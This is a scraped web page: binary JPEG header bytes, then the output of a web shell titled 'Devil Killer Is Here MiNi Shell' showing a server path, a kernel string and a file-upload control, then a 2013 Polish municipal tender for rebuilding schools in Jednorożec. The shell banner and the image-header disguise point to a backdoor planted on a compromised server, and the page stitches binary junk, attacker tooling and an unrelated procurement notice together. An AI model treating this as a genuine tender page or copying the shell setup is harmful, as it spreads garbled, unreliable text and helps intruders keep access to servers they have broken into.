JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130816/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130816/331166-N-2013.html

<p class="kh_header"><b>Jednorożec: Poprawa warunków edukacyjnych dzieci i młodzieży w Gminie Jednorożec</b><br>
<b>Numer ogłoszenia: 331166 - 2013; data zamieszczenia: 16.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Jednorożcu , ul. Odrodzenia 14, 06-323 Jednorożec, woj. mazowieckie, tel. 029 7518392, faks 029 7517031.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa warunków edukacyjnych dzieci i młodzieży w Gminie Jednorożec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest kompleksowa rozbudowa i remont budynku Szkoły Podstawowej w Jednorożcu, Publicznego Gimnazjum w Jednorożcu oraz dokończenie budowy hali widowiskowo - sportowej w Jednorożcu wraz z łącznikiem pomiędzy halą, a Szkołą Podstawową.
Zakres robót będzie obejmował m.in.:
I. Szkoła Podstawowa w Jednorożcu:
- modernizacja funkcjonalna parteru i piętra budynku poprzez odtworzenie reprezentacyjnego wejścia do budynku,
- remont istniejących sal dydaktycznych,
- remont sanitariatów,
- zmiana lokalizacji pomieszczeń administracyjnych,
- budowa szybu windy hydraulicznej,
- adaptacja poddasza nieużytkowego na cele dydaktyczne,
- wymiana drewnianych stropów na stropy typu Teriva,
- przebudowa klatek schodowych,
- wymiana stolarki okiennej i drzwiowej,
- docieplenie ścian zewnętrznych i wykonanie elewacji tynkiem silikonowym,
- wykonanie wentylacji nawiewno - wywiewnej odzyskiem ciepła i chłodzeniem latem,
- wykonanie wewnętrznej instalacji grzewczej promiennikami sufitowymi i instalacji ciepła technologicznego na potrzeby  wentylacji mechanicznej,
- remont wewnętrznej instalacji wod-kan i hydrantowej,
- remont instalacji elektrycznej, odgromowej i telekomunikacyjnej,
- itp.
II. Publiczne Gimnazjum w Jednorożcu:
- remont i zadaszenie tarasu wejściowego,
- dobudowa ewakuacyjnej klatki schodowej,
- wykonanie patio wejściowego wraz z windą dla osób  niepełnosprawnych,
- wykonanie termomodernizacji budynku,
- modernizacja dachu w celu uzyskania dachu mansardowego wraz z wymianą pokrycia dachowego,
- wzmocnienie konstrukcji budynku,
- przebudowa i remont pomieszczeń budynku z przystosowaniem funkcjonalnym,
- itp.
III. Dokończenie budowy hali widowiskowo - sportowej w Jednorożcu:
Dotychczas zrealizowano fundamentowanie, stalową konstrukcję hali i częściowo ściany zewnętrzne hali i łącznika.

Budowa hali sportowo - widowiskowej wraz z łącznikiem pomiędzy budynkiem Szkoły Podstawowej, a projektowaną halą widowiskowo - sportową, na działce nr 1298 w Jednorożcu. Projektowana hala widowiskowo - sportowa jest obiektem wolnostojącym. Rzut obiektu jest prostokątem o szerokości 39,40 m i długości 45, 49 m. Wysokość hali wynosi 11,89 m.
Część hali widowiskowo - sportowej stanowi dwukondygnacyjne zaplecze szatniowo - sanitarne. Zaplecze szatniowo - sanitarne składa się z przebieralni, natryskowni i WC. Pomieszczenia te usytuowane są na poziomie sali. Przebieralnie dostępne są bezpośrednio z sali sportowej oraz z korytarza przez przedsionki izolujące. Pozostałe pomieszczenia to magazynki sprzętu, pomieszczenia trenerów i pomieszczenia techniczne. Przy głównym wejściu zaprojektowano również szatnię dla gości i WC ogólnodostępne.
Nad zapleczem szatniowo - sanitarnym zaprojektowano trybuny dla 298 osób.
Połączenie hali widowiskowo-sportowej z istniejącym budynkiem Szkoły Podstawowej stanowić będzie projektowany łącznik parterowy częściowo podpiwniczony. W łączniku oprócz korytarza łączącego halę ze szkołą zaprojektowano główne wejście i szatnie dla uczniów Szkoły Podstawowej. W piwnicy łącznika zlokalizowano kotłownię oraz magazyn sprzętu terenowego. Dostęp do pomieszczeń piwnicy z zewnątrz.
Dach budynku hali widowiskowo - sportowej dwuspadowy o nachyleniu połaci dachowych 11,60. 
Projektowana hala wyposażona będzie w następujące instalacje: wody zimnej, wody ciepłej, kanalizacji sanitarnej i deszczowej, wentylacji mechanicznej, c.o. i c.t., elektryczną oświetleniową i gniazd wtykowych, odgromową oraz telefoniczną.
Dach budynku łącznika wielospadowy o nachyleniu połaci dachowych 3o. 
Projektowany łącznik wyposażony będzie w następujące instalacje: wentylacji mechanicznej, c.o. i c.t., elektryczną oświetleniową i gniazd wtykowych, odgromową, kanalizacji deszczowej, instalacji solarnej.
IV. Zagospodarowanie terenu działki szkolnej:
- budowa parkingu dla samochodów osobowych,
- budowa skwerku pomiędzy budynkiem szkoły podstawowej, a halą widowiskowo - sportową,
- budowa i montaż elementów małej architektury,
- budowa wjazdu wraz z placem manewrowym dla obsługi autobusów szkolnych,
- budowa pozostałych ciągów pieszo - jezdnych,
- budowa obiektów sportowych - skocznia, bieżnia oraz boisko wielofunkcyjne,
- itp.

Szczegółowy opis przedmiotu zamówienia zawiera:
- dokumentacja projektowa udostępniona na www.bip.jednorozec.pl zakładka Przetargi,
- przedmiar robót,
- specyfikacja techniczna w części zawierającej wymagania w zakresie sposobu wykonania robót budowlanych, w zakresie właściwości materiałów, oceny prawidłowości wykonania poszczególnych robót.

Ewentualne, użyte w projekcie budowlanym, Specyfikacji technicznej wykonania i odbioru robót oraz w przedmiarze robót nazwy materiałów i urządzeń nie są obowiązujące i należy je traktować jako propozycje projektanta. Użyte nazwy są tylko rodzajem wskazówek określających podstawowe parametry dobranego materiału, urządzenia lub technologii i stanowią podstawę porównawczą. Wykonawca może zastosować materiały i urządzenia równoważne o parametrach techniczno - użytkowych odpowiadającym parametrom zaproponowanym w dokumentacji projektowej, pod warunkiem, że będą posiadały one równą wartość techniczną, użytkową i estetyczną i będą spełniać określone w SIWZ wymagania. Przed złożeniem oferty Zamawiający zaleca dokonanie wizji lokalnej w terenie. Po dokonaniu wizji lokalnej i stwierdzeniu zaistnienia ewentualnych niezgodności przedmiaru robót z pozostałymi częściami dokumentacji projektowej, oczywistych omyłek lub pominięcia niektórych robót, Wykonawca ma obowiązek zgłosić do Zamawiającego wniosek o wyjaśnienie w trybie art.38 uPzp. Nie wniesienie zastrzeżeń w w/w zakresie skutkuje obowiązkiem wykonania przez Wykonawcę robót zgodnie z dokumentacją techniczną i wiedzą techniczną, zgodnie z art.647 KC. 

Wykonawca zobowiązany jest zgromadzić wszelkie informacje, które mogą być konieczne do prawidłowego przygotowania oferty.

Wykonawca pokrywa wszelkie koszty dojazdów, zakwaterowania, wyżywienia swoich pracowników oraz obsługi inwestycji poniesione w związku z realizacją powierzonych mu obowiązków wynikających z zapisów niniejszej umowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego do 30% wartości zamówienia podstawowego, jeżeli w czasie wykonywania zamówienia stwierdzone zostaną wady projektu i zmianie ulegnie funkcja niektórych obiektów lub pomieszczeń składających się na przedmiot zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.25-0, 45.37.40.00-2, 45.21.42.00-0, 45.11.00.00-1, 45.11.12.00-0, 45.26.22.10-6, 45.26.25.22-6, 45.26.23.00-6, 45.26.23.11-4, 45.26.12.10-9, 45.42.20.00-1, 45.32.10.00-3, 45.42.10.00-4, 45.32.00.00-6, 45.43.21.10-8, 45.41.00.00-4, 45.23.32.50-6, 45.31.12.00-2, 45.33.11.00-7, 45.33.20.00-9, 45.33.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga od wykonawców wniesienia wadium w wysokości 100.000,00 zł w jednej z dopuszczalnych form określonych w ustawie Pzp i załączenia potwierdzenia jego wniesienia do oferty. 
Zamawiający prosi aby potwierdzenie wniesienia wadium w innej formie niż pieniężna załączyć do oferty w postaci kserokopii potwierdzonej za zgodność z oryginałem, co pozwoli uniknąć dekompletacji oferty w momencie zwrotu wadium.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na wyodrębniony rachunek bankowy Zamawiającego, tj. Gmina Jednorożec, ul. Odrodzenia 14, 06-323 Jednorożec, Bank Spółdzielczy Przasnysz, Nr konta: 
81 892400070011 748920030002 do dnia 09.09.2013 r., do godz. 10.00.
Oferta niezabezpieczona wadium w formie wymaganej zostanie przez Zamawiającego odrzucona, a wykonawca wykluczony z postępowania o zamówienie publiczne.
Zasady zwrotu wadium oraz jego utraty określa art.46 ust.1-5 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Poprzez posiadanie wiedzy i doświadczenia Zamawiający uważa wykazanie się przez Wykonawcę - wykonaniem w okresie ostatnich 5 lat (przed upływem składania ofert), a jeśli okres prowadzenia działalności jest krótszy, to w tym okresie, z należytą starannością, min. 1 roboty dotyczącej realizacji obiektu budowlanego  o wartości robót nie mniejszej niż 4.000.000,00 zł brutto lub o kubaturze nie mniejszej niż 16.000,00 m3 (np. hali sportowej, hali widowiskowej, hali przemysłowej, hali wystawowej, wielkopowierzchniowego obiektu handlowego itp.), min.1 roboty dotyczącej budowy/przebudowy/rozbudowy/remontu obiektu budowlanego o wartości co najmniej 2.000.000,00 zł brutto oraz 1 roboty budowlanej dotyczącej zagospodarowania terenu tj. m.in. budowy nawierzchni brukowych dla komunikacji pieszej i kołowej, placów z uwzględnieniem elementów małej architektury itp. o wartości co najmniej 1.000.000,00 zł brutto.
Ocena spełniania ww warunku dokonana zostanie zgodnie z formułą spełnianie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego) dołączonych do oferty. Z treści dokumentu musi jednoznacznie wynikać, że Wykonawca spełnia ww warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku szczegółowego w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przez dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia zamawiający uważa wykazanie się przez Wykonawcę posiadaniem do dyspozycji niezbędnego potencjału kadrowego tj.
a)	kierownika budowy - uprawnienia do kierowania i nadzorowania robót budowlanych bez ograniczeń 
w specjalności konstrukcyjno - budowlanej, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo Budowlane oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, powinny to być uprawnienia równoważne, zgodne z obowiązującym na dzień wydania prawem, wystawione przed upływem terminu składania ofert, ze wskazaniem tych osób;
b)	 kierownika robót sanitarnych - uprawnienia do kierowania i nadzorowania robót budowlanych bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo Budowlane oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, powinny to być uprawnienia równoważne, zgodne z obowiązującym na dzień wydania prawem, wystawione przed upływem terminu składania ofert, ze wskazaniem tych osób;
c)	kierownika robót elektrycznych - uprawnienia do kierowania i nadzorowania robót budowlanych bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo Budowlane oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, powinny to być uprawnienia równoważne, zgodne z obowiązującym na dzień wydania prawem, wystawione przed upływem terminu składania ofert, ze wskazaniem tych osób.
Zamawiający dopuszcza jednocześnie pełnienie przez 1 osobę funkcji kierownika robót w kilku ww specjalnościach pod warunkiem posiadania odpowiedniego doświadczenia i uprawnień.
Ocena spełniania ww warunku dokonana zostanie zgodnie z formułą spełnianie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego) dołączonych do oferty. Z treści dokumentu musi jednoznacznie wynikać, że Wykonawca spełnia ww warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia ten warunek należy złożyć następujące dokumenty:
Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą, że dla zabezpieczenia bieżącego wykonywania robót posiada środki własne lub dostęp do kredytu w wysokości min. 8.000.000,00 zł. Powyższa informacja musi być wystawiona nie wcześniej niż 3 miesiące przed upływem terminu złożenia oferty.
Ocena spełniania ww warunku dokonana zostanie zgodnie z formułą spełnianie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego) dołączonych do oferty. Z treści dokumentu musi jednoznacznie wynikać, że Wykonawca spełnia ww warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Poprzez posiadanie wiedzy i doświadczenia Zamawiający uważa wykazanie się przez Wykonawcę - wykonaniem w okresie ostatnich 5 lat (przed upływem składania ofert), a jeśli okres prowadzenia działalności jest krótszy, to w tym okresie, z należytą starannością, min. 1 roboty dotyczącej realizacji obiektu budowlanego  o wartości robót nie mniejszej niż 4.000.000,00 zł brutto lub o kubaturze nie mniejszej niż 16.000,00 m3 (np. hali sportowej, hali widowiskowej, hali przemysłowej, hali wystawowej, wielkopowierzchniowego obiektu handlowego itp.), min.1 roboty dotyczącej budowy/przebudowy/rozbudowy/remontu obiektu budowlanego o wartości co najmniej 2.000.000,00 zł brutto oraz 1 roboty budowlanej dotyczącej zagospodarowania terenu tj. m.in. budowy nawierzchni brukowych dla komunikacji pieszej i kołowej, placów z uwzględnieniem elementów małej architektury itp. o wartości co najmniej 1.000.000,00 zł brutto.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany zawartej z Wykonawcą umowy, o której mowa w art.144 ustawy Prawo zamówień publicznych, w zakresie:
1) Zmiany terminu obowiązywania umowy spowodowanej:
a)	wystąpieniem robót dodatkowych, określonych w art.67 ust.1 pkt 5 ustawy Prawo zamówień publicznych oraz w przypadkach określonych w pkt 2,
b)	wystąpieniem robót uzupełniających, określonych w art.67 ust.1 pkt 6 ustawy Prawo zamówień publicznych,
c)	wystąpieniem zdarzeń losowych takich jak śmierć wykonawcy inwestycji będącego osobą fizyczną prowadzącą działalność gospodarczą,
d)	wstrzymaniem budowy przez właściwy organ z przyczyn niezawinionych przez wykonawcę inwestycji, np.: dokonanie odkrywki archeologicznej, odkrycie niewybuchu, itp.,
e)	wystąpieniem siły wyższej np.: trąby powietrznej, pożaru, powodzi,
f)	wystąpieniem skrajnie niekorzystnych warunków pogodowych uniemożliwiających dochowanie wymogów technicznych i technologicznych,
g)	wystąpieniem przedłużania się okresu osiągania parametrów technologicznych niezawinionego przez wykonawcę inwestycji,
h)	wystąpieniem osuwisk gruntu nieustalonych w oparciu o dokonane badania geologiczne lub występujące ponad normy, dotyczy również wystąpienia innych, niedających się przewidzieć zjawisk geologicznych i hydrologicznych pojawiających się w trakcie budowy,
i)	wystąpieniem udokumentowanych przez wykonawcę inwestycji, niezawinionych przez niego opóźnień w dostawie urządzeń technologicznych,
j)	zmianą terminu wykonania przedmiotu umowy o dofinansowanie Inwestycji, w przypadku konieczności wprowadzenia zmian do Projektu,
k)	zaistnieniem istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy.
